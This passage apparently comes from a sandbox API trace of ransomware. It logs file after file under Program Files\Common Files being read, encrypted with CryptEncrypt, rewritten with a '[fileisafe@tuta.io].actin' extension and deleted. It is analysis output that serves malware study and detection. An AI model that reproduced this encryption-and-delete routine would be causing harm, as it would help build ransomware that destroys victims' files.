pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0148.085] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.085] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0148.085] CryptDestroyKey (hKey=0xac2df0) returned 1 [0148.085] CloseHandle (hObject=0x2f4) returned 1 [0148.086] CloseHandle (hObject=0x2ec) returned 1 [0148.559] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll")) returned 1 [0148.569] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.569] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=48872) returned 1 [0148.569] CloseHandle (hObject=0x2f8) returned 1 [0148.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll")) returned 0x20 [0148.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.570] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.570] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.570] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3330) returned 1 [0148.570] CryptSetKeyParam (hKey=0xac3330, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.570] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xbee8, lpOverlapped=0x0) returned 1 [0148.573] CryptEncrypt (in: hKey=0xac3330, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xbef0, dwBufLen=0xbef0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xbef0) returned 1 [0148.573] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xbef0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xbef0, lpOverlapped=0x0) returned 1 [0148.575] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32f0) returned 1 [0148.575] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.575] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0148.575] CryptDestroyKey (hKey=0xac32f0) returned 1 [0148.575] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0148.575] CryptDestroyKey (hKey=0xac3330) returned 1 [0148.575] CloseHandle (hObject=0x2f8) returned 1 [0148.575] CloseHandle (hObject=0x308) returned 1 [0148.575] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll")) returned 1 [0148.578] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.578] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=168064) returned 1 [0148.579] CloseHandle (hObject=0x308) returned 1 [0148.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll")) returned 0x20 [0148.579] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.579] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.579] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.579] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.582] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32f0) returned 1 [0148.582] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.582] ReadFile (in: hFile=0x308, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x29080, lpOverlapped=0x0) returned 1 [0148.586] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x29090, dwBufLen=0x29090 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x29090) returned 1 [0148.586] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x29090, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x29090, lpOverlapped=0x0) returned 1 [0148.589] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0148.589] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.589] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0148.589] CryptDestroyKey (hKey=0xac3130) returned 1 [0148.589] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0148.590] CryptDestroyKey (hKey=0xac32f0) returned 1 [0148.590] CloseHandle (hObject=0x308) returned 1 [0148.590] CloseHandle (hObject=0x2f8) returned 1 [0148.590] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll")) returned 1 [0148.592] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.593] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=17048) returned 1 [0148.593] CloseHandle (hObject=0x2f8) returned 1 [0148.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 0x20 [0148.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.593] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.593] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.594] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2d30) returned 1 [0148.594] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.594] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4298, lpOverlapped=0x0) returned 1 [0148.596] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x42a0, dwBufLen=0x42a0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x42a0) returned 1 [0148.596] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x42a0, lpOverlapped=0x0) returned 1 [0148.597] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2f30) returned 1 [0148.597] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.597] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0148.597] CryptDestroyKey (hKey=0xac2f30) returned 1 [0148.597] WriteFile (in: hFile=0x308, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0148.597] CryptDestroyKey (hKey=0xac2d30) returned 1 [0148.597] CloseHandle (hObject=0x2f8) returned 1 [0148.597] CloseHandle (hObject=0x308) returned 1 [0148.597] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb")) returned 1 [0148.598] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.599] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=22680) returned 1 [0148.599] CloseHandle (hObject=0x308) returned 1 [0148.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 0x20 [0148.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0148.599] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.599] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0148.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.599] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32f0) returned 1 [0148.599] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.599] ReadFile (in: hFile=0x308, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x5898, lpOverlapped=0x0) returned 1 [0148.901] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x58a0, dwBufLen=0x58a0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x58a0) returned 1 [0148.902] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x58a0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x58a0, lpOverlapped=0x0) returned 1 [0148.903] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2db0) returned 1 [0148.903] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.903] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0148.903] CryptDestroyKey (hKey=0xac2db0) returned 1 [0148.903] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0148.903] CryptDestroyKey (hKey=0xac32f0) returned 1 [0148.903] CloseHandle (hObject=0x308) returned 1 [0148.903] CloseHandle (hObject=0x2f8) returned 1 [0148.904] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb")) returned 1 [0148.905] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.906] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=32768) returned 1 [0148.906] CloseHandle (hObject=0x2f8) returned 1 [0148.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll")) returned 0x20 [0148.906] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\directdb.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files\\common files\\system\\directdb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.906] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.907] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=94208) returned 1 [0148.907] CloseHandle (hObject=0x2f8) returned 1 [0148.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui")) returned 0x20 [0148.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.908] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.908] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.909] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=630) returned 1 [0148.909] CloseHandle (hObject=0x2f8) returned 1 [0148.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0148.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.909] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.909] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.910] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=623) returned 1 [0148.910] CloseHandle (hObject=0x2f8) returned 1 [0148.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20 [0148.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.910] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0148.911] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=10240) returned 1 [0148.911] CloseHandle (hObject=0x2f8) returned 1 [0148.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui")) returned 0x20 [0148.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0148.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0148.911] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0148.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 